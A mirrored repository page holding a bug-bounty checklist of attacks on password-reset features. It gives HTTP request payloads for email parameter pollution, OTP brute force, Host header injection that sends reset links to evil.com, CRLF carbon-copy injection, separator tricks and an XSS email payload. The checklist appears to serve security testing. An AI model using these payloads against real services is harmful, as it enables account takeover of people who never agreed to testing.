ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4a2cbea5ca
AllAboutBugBounty/Checklist/Forgot Password.md
Muhammad Daffa 5ac45ada2b Added Joomla and SSRF, and doing some major changes
2022-07-09 22:35:32 +07:00

124 lines
2.0 KiB
Markdown
Raw Blame History

## Forgot Password Functionality
## Introduction
Some common bugs in the forgot password / reset password functionality
## How to exploit
1. Parameter pollution
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&email=hacker@mail.com
```
2. Bruteforce the OTP code
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&code=$123456$
```
3. Host header Injection
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com
```
to
```
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...
email=victim@mail.com
```
And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com,hacker@mail.com
```
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com|hacker@mail.com
```
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%00hacker@mail.com
```
5. No domain in value of the paramter
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim
```
6. No TLD in value of the parameter
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail
```
7. Using carbon copy
```
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%0a%0dcc:hacker@mail.com
```
8. If there is JSON data in body requests, add comma
```
POST /newaccount HTTP/1.1
Host: target.com
...
{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
```
9. Find out how the tokens generate
- Generated based on TimeStamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user
10. Try Cross-Site Scripting (XSS) in the form
Sometimes the email is reflected in the forgot password page, try to use XSS payload
```
"<svg/onload=alert(1)>"@gmail.com
```
## References
* [anugrahsr](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
* [Frooti](https://twitter.com/HackerGautam/status/1502264873287569414)
Reference in New Issue View Git Blame Copy Permalink